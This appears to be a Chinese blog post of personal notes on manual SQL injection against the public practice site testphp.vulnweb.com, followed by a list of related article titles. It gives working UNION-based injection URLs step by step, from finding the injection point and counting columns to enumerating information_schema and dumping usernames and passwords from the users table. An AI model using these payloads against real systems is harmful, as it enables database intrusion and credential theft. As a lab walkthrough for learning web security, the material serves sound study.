SQL手工注入网站笔记

目标网站:http://testphp.vulnweb.com/listproducts.php?cat=1

1.判断注入点:
http://testphp.vulnweb.com/listproducts.php?cat=1’
http://testphp.vulnweb.com/listproducts.php?cat=1 and 1=1 永真条件,回显正常
http://testphp.vulnweb.com/listproducts.php?cat=1 and 1=2 永假条件,回显空白界面

2.猜字段:
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 11 回显正常
http://testphp.vulnweb.com/listproducts.php?cat=1 order by 12 回显报错
故共有11个字段

3.判断注入点:
http://testphp.vulnweb.com/listproducts.php?cat=-1 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11

即可判断,注入点可以为11,7,2,9

4.查询数据库版本:
http://testphp.vulnweb.com/listproducts.php?cat=-1 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,version()

数据库版本在5.0 以上,则会存在一个information_schema库存放所有表名称。

5.查数据库名:
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,database()

可得知数据库名称为:acuart

6.查表名:
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,table_name from information_schema.tables where table_schema=“acuart”
以上默认查数据库中第一个表名
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,group_concat(table_name) from information_schema.tables where table_schema=“acuart”
查询该数据库中所有表名

7.查表的字段:
根据经验我们可以猜测 账号密码信息放置于users表中。
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,group_concat(column_name) from information_schema.columns where table_schema=“acuart” and table_name=“users”

8.查询users表中的uname,pass
http://testphp.vulnweb.com/listproducts.php?cat=-1%20+UNION+ALL+SELECT+1,pass,3,4,5,6,uname,8,9,10,11 from users
由此获得账号:test 密码:test

SQL手工注入网站笔记相关推荐

  1. SQL手工注入入门级笔记(更新中)

    一.字符型注入 针对如下php代码进行注入: $sql="select user_name from users where name='$_GET['name']'"; 正常访问 ...

  2. 墨者学院刷题笔记——SQL手工注入漏洞测试(MongoDB数据库)

    今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL手工注入漏洞测试(MongoDB数据库). 一.题目简介 我们这里采用墨者学院的MongoDB数据库渗透测试题目,其地址为:https:/ ...

  3. 墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)

    0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入.同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清 ...

  4. 墨者学院01 SQL手工注入漏洞测试(MySQL数据库)

    问题描述 鉴于我已经两周没能成功运行攻防世界的靶场环境...于是昨天又搜了一些网站,感觉墨者学院的题目还可以~ SQL手工注入虽然是一个已经被安全博主讲烂的主题,但是我之前很少有从头到尾实践手工注入的 ...

  5. python sql注入脚本_python辅助sql手工注入猜解数据库案例分析

    发现存在sql注入漏洞 简单一点可以直接用sqlmap工具暴库 但是如果想深入理解sql注入的原理,可以尝试手工注入,配合python脚本实现手工猜解数据库 首先hachbar开启 获取cms登录后的 ...

  6. SQL手工注入漏洞测试(Oracle数据库)

    SQL手工注入漏洞测试(Oracle数据库) 0x01前言 本文旨在讲述Oracle数据库多种情况下如何进行注入 靶场地址:SQL手工注入漏洞测试(Oracle数据库)_SQL注入_在线靶场_墨者学院 ...

  7. Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))

    本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Oracle数据库). 地址:http://124.70.22.208:42948/new_list.php?id=1(注意地址已 ...

  8. 墨者学院SQL手工注入靶场漏洞详解

    墨者学院SQL手工注入靶场漏洞详解 目录 靶场地址 步骤详解 目录 靶场地址 该靶场由墨者学院安全工程师"墨者"所搭建,靶场环境为Nginx+PHP+MySQL,启动靶场只需1墨币 ...

  9. SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))

    本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Sql Server数据库). 地址:http://219.153.49.228:42295/new_list.asp?id=2( ...

最新文章

  1. Spring基础面试题(一)
  2. WMI技术介绍和应用——查询桌面信息
  3. PHP类参数_PHP依赖注入的含义
  4. 矩阵求逆c语言实现_[V-SLAM] Bundle Adjustment 实现
  5. 李兰娟院士等新冠病毒鸡尾酒疗法研究取得新进展
  6. 【ElasticSearch】Es 源码之 MetadataUpgrader 源码解读
  7. 最大子序和--动态规划
  8. python one class svm_sklearn例程:OneClassSVM物种分布建模
  9. VMProtect修复导入表的插件
  10. 【测绘程序设计】C#将度分秒(° ‘ “)转换度(°)程序实现(附源码)
  11. maxscale mysql_Maxscale实现Mysql读写分离
  12. DirectX11学习笔记五 摄像机类
  13. Macbook安装pkg
  14. 面对台风“烟花”,旅行延误会如何赔付?
  15. java程序如何在手机运行_怎么在手机上运行手机JAVA程序
  16. 域账号加到本机管理员组和本机Power Users组
  17. 关于LM3886TF
  18. 海思Hi3136芯片怎么样?Hi3136处理器参数介绍
  19. 金丝楠PhoebeSheareri
  20. Huffman图像压缩

热门文章

  1. 优秀的GPS定位系统源码对开发者意味着什么
  2. 新鲜面经——腾讯金融类后台开发
  3. 页面锚点链接点击平滑滚动
  4. 字王·汉字结构·熵·理论
  5. Linux PK Windows ,Linux本轮胜出 (伦敦证券交易所将使用Linux )
  6. Containerd镜像lazy-pulling解读
  7. c语言equals用法,C# 中 equals( ) 和 == 的区别和用法
  8. 霍尔传感器中关于磁参数的理解
  9. 2.NetWork中各种信息的意思
  10. CSC访学、博士后、联培选择国家的避坑指南-美英篇